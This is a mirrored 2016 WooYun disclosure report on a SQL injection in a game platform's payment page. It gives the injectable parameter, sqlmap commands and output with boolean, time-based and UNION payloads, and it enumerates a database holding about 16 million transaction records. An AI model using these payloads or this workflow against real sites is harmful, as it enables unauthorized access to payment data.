游光网络爱微游平台某处SQL注入可UNION(泄漏1600万交易记录)

admin
admin
admin
139160
文章
114
评论
2017年4月26日11:06:54评论281 views字数 255阅读0分51秒阅读模式
摘要

2016-05-02: 细节已通知厂商并且等待厂商处理中
2016-05-06: 厂商已经确认,细节仅向厂商公开
2016-05-16: 细节向核心白帽子及相关领域专家公开
2016-05-26: 细节向普通白帽子公开
2016-06-05: 细节向实习白帽子公开
2016-06-20: 细节向公众公开

漏洞概要 关注数(11) 关注此漏洞

缺陷编号: WooYun-2016-203207

漏洞标题: 游光网络爱微游平台某处SQL注入可UNION(泄漏1600万交易记录)

相关厂商: 游光网络

漏洞作者: 我在不想理你

提交时间: 2016-05-02 10:20

公开时间: 2016-06-20 19:40

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: sql injection

0人收藏

漏洞详情

披露状态:

2016-05-02: 细节已通知厂商并且等待厂商处理中
2016-05-06: 厂商已经确认,细节仅向厂商公开
2016-05-16: 细节向核心白帽子及相关领域专家公开
2016-05-26: 细节向普通白帽子公开
2016-06-05: 细节向实习白帽子公开
2016-06-20: 细节向公众公开

简要描述:

RT

详细说明:

code 区域 
http://**.**.**.**/

游光网络是微信游戏比较火的开发商,允许微信不用注册直接登录玩,目前比较火的游戏有 怪兽必须死 勇士之塔 三国浮生记 都允许用微信直接支付充值 我查看了一下交易记录 每一秒都有7/8单充值记录 虽然都是小金额2块5块,但是一天下来收入统计还是很可观

注入点在web充值页面

code 区域 
http://**.**.**.**/pay/alipay2/
mask 区域
*****yap*****
 




?gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8

放sqlmap跑

code 区域 
sqlmap -u 'http://**.**.**.**/pay/alipay2/
mask 区域
*****yap*****
 




?gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8' -p 'product_id'
          _
  ___ ___| |_____ ___ ___  {**.**.**.**#dev}
 |_ -| . | |     | .'| . |
 |___|_  |_|_|_|_|__,|  _|
       |_|           |_|   http://**.**.**.**


 [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


 [*] starting at 20:46:06


 [20:46:07] [WARNING] it appears that you have provided tainted parameter values ('product_id=1 or 8=8') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
 are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
 [20:46:08] [INFO] resuming back-end DBMS 'mysql' 
 [20:46:08] [INFO] testing connection to the target URL
 sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: product_id (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8 AND 9197=9197


     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8 AND (SELECT * FROM (SELECT(SLEEP(5)))ERLp)


     Type: UNION query
     Title: Generic UNION query (NULL) - 3 columns
     Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=-2170 UNION ALL SELECT CONCAT(0x717a7a7071,0x4978706a5555576761676c5362744f51736a417a59584c594a59524749636441446e784c64546671,0x717a627671),NULL,NULL-- -
 ---
 [20:46:08] [INFO] the back-end DBMS is MySQL
 web application technology: Nginx
 back-end DBMS: MySQL 5.0.12

漏洞证明:

数据库

code 区域 
sqlmap -u 'http://**.**.**.**/pay/alipay2/
mask 区域
*****yap*****
 




?gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8' -p 'product_id' -D money --tables --count
          _
  ___ ___| |_____ ___ ___  {**.**.**.**#dev}
 |_ -| . | |     | .'| . |
 |___|_  |_|_|_|_|__,|  _|
       |_|           |_|   http://**.**.**.**


 [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program


 [*] starting at 20:47:00


 [20:47:00] [WARNING] it appears that you have provided tainted parameter values ('product_id=1 or 8=8') with most probably leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
 are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
 [20:47:01] [INFO] resuming back-end DBMS 'mysql' 
 [20:47:01] [INFO] testing connection to the target URL
 sqlmap resumed the following injection point(s) from stored session:
 ---
 Parameter: product_id (GET)
     Type: boolean-based blind
     Title: AND boolean-based blind - WHERE or HAVING clause
     Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8 AND 9197=9197


     Type: AND/OR time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
     Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=1 or 8=8 AND (SELECT * FROM (SELECT(SLEEP(5)))ERLp)


     Type: UNION query
     Title: Generic UNION query (NULL) - 3 columns
     Payload: gameid=62&uid=30833542&backurl=http://**.**.**.**&userdata=&user_coupon_id=&txid=&product_id=-2170 UNION ALL SELECT CONCAT(0x717a7a7071,0x4978706a5555576761676c5362744f51736a417a59584c594a59524749636441446e784c64546671,0x717a627671),NULL,NULL-- -
 ---
 [20:47:01] [INFO] the back-end DBMS is MySQL
 web application technology: Nginx
 back-end DBMS: MySQL 5.0.12
 [20:47:01] [INFO] fetching tables for database: 'money'
 [20:47:01] [INFO] the SQL query used returns 19 entries
 [20:47:01] [INFO] resumed: channel_tradeno
 [20:47:01] [INFO] resumed: cp_trans
 [20:47:01] [INFO] resumed: distr_stat
 [20:47:01] [INFO] resumed: distr_sum
 [20:47:01] [INFO] resumed: game_v2
 [20:47:01] [INFO] resumed: marchant
 [20:47:01] [INFO] resumed: mch_func_priv
 [20:47:01] [INFO] resumed: mch_games
 [20:47:01] [INFO] resumed: mch_priv
 [20:47:01] [INFO] resumed: online
 [20:47:01] [INFO] resumed: product_sum
 [20:47:01] [INFO] resumed: product_v2
 [20:47:01] [INFO] resumed: register
 [20:47:01] [INFO] resumed: sum
 [20:47:01] [INFO] resumed: talking_data_result
 [20:47:01] [INFO] resumed: trans
 [20:47:01] [INFO] resumed: trans_back
 [20:47:01] [INFO] resumed: user_channel_sum
 [20:47:01] [INFO] resumed: user_channel_trans
 Database: money                                                                
 [19 tables]
 +---------------------+
 | sum                 |
 | channel_tradeno     |
 | cp_trans            |
 | distr_stat          |
 | distr_sum           |
 | game_v2             |
 | marchant            |
 | mch_func_priv       |
 | mch_games           |
 | mch_priv            |
 | online              |
 | product_sum         |
 | product_v2          |
 | register            |
 | talking_data_result |
 | trans               |
 | trans_back          |
 | user_channel_sum    |
 | user_channel_trans  |
 +---------------------+


 [20:47:01] [WARNING] missing table parameter, sqlmap will retrieve the number of entries for all database management system databases' tables
 Database: money
 +---------------------+---------+
 | Table               | Entries |
 +---------------------+---------+
 | trans               | 16486615 |
 | trans_back          | 14759999 |
 | online              | 7397218 |
 | cp_trans            | 113319  |
 | product_sum         | 27005   |
 | `sum`               | 15403   |
 | talking_data_result | 11257   |
 | user_channel_sum    | 3924    |
 | distr_sum           | 2431    |
 | channel_tradeno     | 1776    |
 | product_v2          | 687     |
 | distr_stat          | 571     |
 | mch_games           | 150     |
 | game_v2             | 89      |
 | marchant            | 78      |
 | register            | 45      |
 | mch_priv            | 5       |
 | mch_func_priv       | 1       |
 +---------------------+---------+

1600W交易记录

修复方案:

过滤

版权声明:转载请注明来源 我在不想理你@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-06 19:37

厂商回复:

CNVD未直接确认所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-05-02 10:44 | sauce ( 普通白帽子 | Rank:285 漏洞数:46 | 面向人民币编程)

    0

    你没治了

  2. 2016-05-02 14:18 | 我在不想理你 ( 普通白帽子 | Rank:203 漏洞数:60 | 人生路漫漫)

    0

    @sauce 第一次上头条

  3. 2016-05-02 15:52 | Exploit DB ( 普通白帽子 | Rank:699 漏洞数:156 | 水能载舟,亦可覆舟。)

    0

    呵呵 洞主可以来我的一个交流群探讨一下。

  4. 2016-05-02 16:10 | Freebug ( 普通白帽子 | Rank:110 漏洞数:39 | 流氓是一种高尚的职业!)

    0

    火速留名

  5. 2016-05-02 17:55 | hear7v ( 普通白帽子 | Rank:175 漏洞数:26 | 求组织收留啊)

    0

    @我在不想理你 原来在这啊

  6. 2016-06-20 20:06 | 哇哈哈 ( 路人 | Rank:2 漏洞数:1 | 啥都不会)

    0

    @Exploit DB 交流群多少啊?

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin